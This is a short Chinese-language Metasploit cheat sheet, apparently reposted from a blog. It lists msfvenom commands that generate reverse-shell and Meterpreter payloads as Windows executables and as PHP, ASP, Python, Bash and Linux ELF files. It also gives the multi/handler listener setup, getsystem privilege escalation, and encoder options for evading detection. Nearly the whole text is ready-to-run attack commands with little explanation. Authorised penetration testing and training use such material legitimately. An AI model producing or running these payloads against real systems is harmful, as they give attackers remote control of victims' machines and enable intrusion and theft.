1、生成反弹木马(脚本,执行程序)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe -o shell.exe
2、MSF接受设置
1 use exploit/multi/handler
2 set payload windows/meterpreter/reverse_tcp
3 set LHOST 192.168.1.111
4 Exploit
3、采用自动化提权,调用其他EXP进行提权
Getuid 查看当前权限
Getsystem 自动化提升
4、MSF Payloads
1 msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> X > system.exe
2 msfvenom -p php/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 R > exploit.php
3 msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e -a x86 --platform win -f asp -o file.asp
4 msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e x86/shikata_ga_nai -b "\x00" -a x86 --platform win -f c
MSF 生成在 Linux 下反弹的 Meterpreter Shell
1 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e -f elf -a x86 --platform linux -o shell
MSF 生成反弹 Shell (C Shellcode)
1 msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=443 -b "\x00\x0a\x0d" -a x86 --platform win -f c
MSF 生成反弹 Python Shell
1 msfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=443 -o shell.py
MSF 生成反弹 ASP Shell
1 msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp -a x86 --platform win -o shell.asp
MSF 生成反弹 Bash Shell
1 msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.sh
MSF 生成反弹 PHP Shell
1 msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.php
2 add <?php at the beginning
3 perl -i~ -0777pe's/^/<?php \n/' shell.php
MSF 生成反弹 Win Shell
1 msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe -a x86 --platform win -o shell.exe
from:http://www.cnblogs.com/sqyysec/p/6915492.html